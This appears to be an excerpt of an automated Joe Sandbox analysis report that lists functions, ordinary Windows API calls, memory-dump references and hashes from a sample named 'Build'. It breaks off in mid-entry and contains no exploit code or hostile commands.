Instruction Fuzzy Hash: 88F05E35611229ABDB00DF759D41EEE73ECAF09705F444065BA41D3180EFB1EE889BA4

Function 0094030B Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00940341

Part of subcall function 00924C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00924C13

SetDlgItemTextW.USER32(00000065,?), ref: 00940358

Part of subcall function 0093D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0093D875
Part of subcall function 0093D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093D886
Part of subcall function 0093D864: IsDialogMessageW.USER32(00010458,?), ref: 0093D89A
Part of subcall function 0093D864: TranslateMessage.USER32(?), ref: 0093D8A8
Part of subcall function 0093D864: DispatchMessageW.USER32(?), ref: 0093D8B2

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: cbec5b1da8bb0d17d34a85227edb26a8f8baca8ca17960017d91769e1b664f9c
Instruction ID: e8deb7a4db3b4da0849e3e827a2e273e706b967ac66b047c9298ca2ed2372d4e
Opcode Fuzzy Hash: cbec5b1da8bb0d17d34a85227edb26a8f8baca8ca17960017d91769e1b664f9c
Instruction Fuzzy Hash: B3F0B4715252186ACB01EB7AED16FEF7BAC9B49305F040056F241A31A2DA74AA409F61

Function 0092BCDD Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,0092BCD4,?,00928607,?), ref: 0092BCFA

Part of subcall function 0092DA1E: _wcslen.LIBCMT ref: 0092DA59

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,0092BCD4,?,00928607,?), ref: 0092BD24

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 7a8564df6e760c55cfcaada7333ce8a5a75dde32fc2a16b4062ed4400c1bcd4b
Instruction ID: a42d708a76b9e18a0edba140658ec6b6ee30efa009eed15fb4b6c1ef414156d3
Opcode Fuzzy Hash: 7a8564df6e760c55cfcaada7333ce8a5a75dde32fc2a16b4062ed4400c1bcd4b
Instruction Fuzzy Hash: 0DF0BE316002285BC700EB79AD01EEEB7FCAB8D761F000165FA01E32C1DBB0AE819B90

Function 00933184 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00000002,00000002,?,009331C7,0092D526), ref: 00933191
GetProcessAffinityMask.KERNEL32(00000000,?,009331C7), ref: 00933198

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 3624f8bad3c525bff93f411d1c3e4e9cf1a2f615e76076c86e0858a029233682
Instruction ID: 4b3850b7b8345aa4e778cbc0bce3d688271bf88714143a17e433537c627563de
Opcode Fuzzy Hash: 3624f8bad3c525bff93f411d1c3e4e9cf1a2f615e76076c86e0858a029233682
Instruction Fuzzy Hash: 92E0D832B582056B9F0987F59C058EB73EDDA44215B108079A503D3200FA38DE054FA0

Function 009328AB Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009328D4
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00931309,Crypt32.dll,00000000,00931383,00000200,?,00931366,00000000,00000000,?), ref: 009328F4

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: b284eaeefa8667f8f9b19daf4aa9d32e016007c520c70c905a99575ef5f7cd91
Instruction ID: ce824947846f70bf9bc1dbd4306d914960c2e1d458866c32c87c9d4b44ae1f46
Opcode Fuzzy Hash: b284eaeefa8667f8f9b19daf4aa9d32e016007c520c70c905a99575ef5f7cd91
Instruction Fuzzy Hash: 57F05E75A10218ABCB10DB66DD05EDFB7FCEF89752F000469B605D3140DA74EA859B64

Function 009305C8 Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00927BEB,?,00921436,00927BEB), ref: 009305F8
LoadStringW.USER32(00927BEB,?,00921436), ref: 0093060F

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 78c6ad327e5cac2dba05bb1252e54cebb659f35189106bdf503ce8105d4da3f5
Instruction ID: f0d4a61e8d65537c5ffa416885eeddc9599682ca2a4db3151c8f0d5e45db4d62
Opcode Fuzzy Hash: 78c6ad327e5cac2dba05bb1252e54cebb659f35189106bdf503ce8105d4da3f5
Instruction Fuzzy Hash: 1CF09835118219BBDF111F91EC18DABBF6AFF89794B054425FD1996231D632C860EBA0

Function 0093CD3F Relevance: 3.0, APIs: 2, Instructions: 31comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,0095505D,000000FF), ref: 0093CD7D
OleUninitialize.OLE32(?,?,?,?,0095505D,000000FF), ref: 0093CD82

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 3e1752bb23446d1dc0d04d9c8001585497daa1e058f6344ad0d5f30f53f5f3c3
Instruction ID: a100c3125910587f9f3cbbcce84f8c784b749ac6fee712507443d53309cc3faa
Opcode Fuzzy Hash: 3e1752bb23446d1dc0d04d9c8001585497daa1e058f6344ad0d5f30f53f5f3c3
Instruction Fuzzy Hash: 9DF05476608644AFC700DF55DD05F59FBA8FB49720F00426AF815C37A0DB74A801CB90

Function 0093C34D Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0093C36E
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0093C375

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 7fd2dfdf05a06d9535b830ac0b2de917c02da38772d44f64d9662ca656daa1a7
Instruction ID: 76526082068620aafe8bee31f0f9a044927b7a57d54142fc3f352af9fb2aa3c7
Opcode Fuzzy Hash: 7fd2dfdf05a06d9535b830ac0b2de917c02da38772d44f64d9662ca656daa1a7
Instruction Fuzzy Hash: FEE0EDB1504658EBCB50DF95C541B99B7F8EB05351F10C05AE896A3201E274AE849F51

Function 009451AC Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009451CA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 009451D5

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 8930128e2013c9b987c4db2b16ab2ca3886cf81c749a40b6f2cc145cad231de1
Instruction ID: 69cef1f2621f3cb1819548808e5da66fb6e50977b852961f795732ab811019bf
Opcode Fuzzy Hash: 8930128e2013c9b987c4db2b16ab2ca3886cf81c749a40b6f2cc145cad231de1
Instruction Fuzzy Hash: 53D0A96996CF005A8C103BF02822F5A274899877B93B21A4AE4208A1C3EA92E4446212

Function 00921341 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00921356
ShowWindow.USER32(00000000), ref: 0092135D

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: a8464b11058e19ac6e408852d0f607eec1980570d9c3a9b6b1bf6fa77aff1df2
Instruction ID: ae55f2d054fa86f6bc2e58beca74bb79b4e84fd427f79e1b4fde65c3c3e31f5e
Opcode Fuzzy Hash: a8464b11058e19ac6e408852d0f607eec1980570d9c3a9b6b1bf6fa77aff1df2
Instruction Fuzzy Hash: 73C0123206C200BECB010BF0DC0DC2ABBA8EBA4212F20CA08F0B6C1160C239C010EB11

Function 00921B63 Relevance: 1.8, APIs: 1, Instructions: 311COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00921B6A

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 2244b6efb6480bc2821178af162bb0dbbf8f5704a5b5a75fdf813cd3f3addd03
Instruction ID: 0830cf23a693b4fb4c6c3a1af718250fb8fbb04cbef51786e82382a97c6f71e2
Opcode Fuzzy Hash: 2244b6efb6480bc2821178af162bb0dbbf8f5704a5b5a75fdf813cd3f3addd03
Instruction Fuzzy Hash: 2EC1D874A042609FDF24DF24D8C47AD7BA9AF66310F1800B9EC46DF39ACB349A54CB61

Function 0092147C Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00921483

Part of subcall function 00926AE8: __EH_prolog3.LIBCMT ref: 00926AEF

Part of subcall function 0092EE0F: __EH_prolog3.LIBCMT ref: 0092EE16

Part of subcall function 0092668F: __EH_prolog3.LIBCMT ref: 00926696

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: e35266f9a591edc4584434c49c416692036a453527e23c621d40b5fd8f040d7e
Instruction ID: 09a81072043037f5122dff756a2e6c58c156566cd43fd366e8b606bf43a3584c
Opcode Fuzzy Hash: e35266f9a591edc4584434c49c416692036a453527e23c621d40b5fd8f040d7e
Instruction Fuzzy Hash: 274117B1A063808ECB14DF69A4C06D97BE1AF69300F0801BEEC5DCF69BD7755255CB62

Function 00935617 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0093561E

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 9c3bed8be8172739962df658e31a92a67eb3bd61f428cc7b2f6eb70b78b2a38e
Instruction ID: 19cacc4888f70d378cd6d25342d2355a8a94fa2047606377ad1344d3f02d0d2f
Opcode Fuzzy Hash: 9c3bed8be8172739962df658e31a92a67eb3bd61f428cc7b2f6eb70b78b2a38e
Instruction Fuzzy Hash: CB21D6B1E41711ABDB14EFB48C46B5B76ACFB48314F46013AE909EB282D7709940CB99

Function 0094D2E8 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0094D348

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 78c816ed6700b4b21cc4cb71e384d05a36463925a3c46113b2463d15f0cb0c7a
Instruction ID: 5179fe4422c2718671f72f8b205c6d14f8ad91b91251f87fb6eeee930ba7ad6b
Opcode Fuzzy Hash: 78c816ed6700b4b21cc4cb71e384d05a36463925a3c46113b2463d15f0cb0c7a
Instruction Fuzzy Hash: 0211293BA12A259B9F359F2DEC40D9E73D9EB883687164224FC15AB294D630EC0197D2

Function 0094EAC9 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0094D786: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0094B9D3,00000001,00000364,?,0094688D,?,?,009650C4), ref: 0094D7C7

_free.LIBCMT ref: 0094EB35

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
Instruction ID: 3f0d63e2a7f2a9a5804031042a4eb48509c1d5f07c2572e6753c21ef2a649c16
Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
Instruction Fuzzy Hash: 3001F9762013456BE321CF6AD881E5AFBEDFBC5370F25051DF59583280EA70A905C774

Function 0092AB81 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0092AB88

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: fe70cbd21d00f8bb34edc6813c912fcf0aa5f7d9fbf8db67ccb8ad56b3d91062
Instruction ID: 3efcdf568ac703104e5d2c684dbe7c549daa6bbabafafb37c17141ebed5d8f0e
Opcode Fuzzy Hash: fe70cbd21d00f8bb34edc6813c912fcf0aa5f7d9fbf8db67ccb8ad56b3d91062
Instruction Fuzzy Hash: 34018037E0063A9BCB25EE64E992FAEB376AF84700B014529FD11AB245CB759C40C792

Function 0094D786 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0094B9D3,00000001,00000364,?,0094688D,?,?,009650C4), ref: 0094D7C7

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 540420091e3c6b33fc67a414b8bc91405c639b6062db1007cc9d9920c05cf6e9
Instruction ID: d421998215b41057275e27a32c9fccdca5b70f1ff32d9b26a0dee001b3dbc80a
Opcode Fuzzy Hash: 540420091e3c6b33fc67a414b8bc91405c639b6062db1007cc9d9920c05cf6e9
Instruction Fuzzy Hash: 1FF0E27A256321A7EF216F76EC41F5B778C9F807A0F144112E808DA695DB24DC0087E1

Function 0092668F Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00926696

Part of subcall function 009311A5: __EH_prolog3.LIBCMT ref: 009311AC

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: dfd0e1df0302ab0c5c43c25326dcf4fdd27cb8af3a805aa85f39882af9122d6e
Instruction ID: 821fa2185da2f99fa888c4b51c14901b6cfdc61b4e58c15c945e00662d681701
Opcode Fuzzy Hash: dfd0e1df0302ab0c5c43c25326dcf4fdd27cb8af3a805aa85f39882af9122d6e
Instruction Fuzzy Hash: 87012874806B64CAD725FBB881527DDFBE4AFA4304F20044EA4AA43292CBB42704CB62

Function 0094BC8E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A24,?,0000015D,?,?,?,?,00947F00,000000FF,00000000,?,?), ref: 0094BCC0

Memory Dump Source

